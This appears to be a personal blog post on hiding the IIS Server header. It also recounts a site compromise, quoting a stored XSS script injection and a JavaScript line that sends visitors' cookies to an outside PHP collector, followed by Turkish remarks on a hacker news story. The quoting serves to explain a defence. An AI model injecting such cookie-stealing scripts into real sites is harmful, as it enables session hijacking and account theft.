ISAPI and IIS Server Header

IIS puts “Server:Microsoft-IIS6” or something like this string into the returned header from server in http. that is somehow a security hole because a person who is interested in doing bad things or anything to some server its first rule for them to learn what are they dealing with.

so I needed to close this way. I made a research but its kinda old old old articles everywhere and not most of them useful. here is my solution. at the end these is source code included for Xmask I tried to change this server header to something else like “Server:Mascix” but it did not work I dunno why but at the end it cleaned what I wanted 🙂

A small hack story

One of my friend came to me and told me he lost his admin user while he was browsing the web site. I was surprised because normally it does not happen. if that site was using asp.net 🙂 its sad but true asp.net does not allow html inclusion in post data. anyway the hacker puts a script code into his name field like this:

src="http://inso.host.sk/sniffer/c.js"></script>

its not a big deal if you look the output of this script you will see this:

a=new/**/Image();a.src=’http://inso.host.sk/sniffer/s.php?a=’+escape(document.cookie);

at the end it stoles browser’s cookie and send it to a php file. while the hacker browsing another url and see which fish got fall for a trick 🙂 anyway today I made a research and found a solution to this situation:

https://addons.mozilla.org/en-US/firefox/addon/722

you should simply disable all js inclusions in the page except the domain. that will make your browser more secure.

Yeni nesil hacker’lar: Edwin Pena | Olympos Security

Yeni nesil hacker’lar: Edwin Pena | Olympos Security

koptum okuyunca yazılımcılar ve pazarlamacılar bu kadar kısa ve özlü bir hikayeyle anlatılabilirdi. moore diye bir adam kodu yazıyor pena ortalığın mına korken bizimki gidip hastane masraflarını ödüyor.

hakimde ödeyemeyeceğini düşünüp pena ya 150 bin$ ceza veriyor moore ödeyemediği için hapse gidiyor. yazık garibana heryerde eziliyor 🙂 manav falan açmalıyız walla bu yazılım işinde kod yazmak yetmiyor…..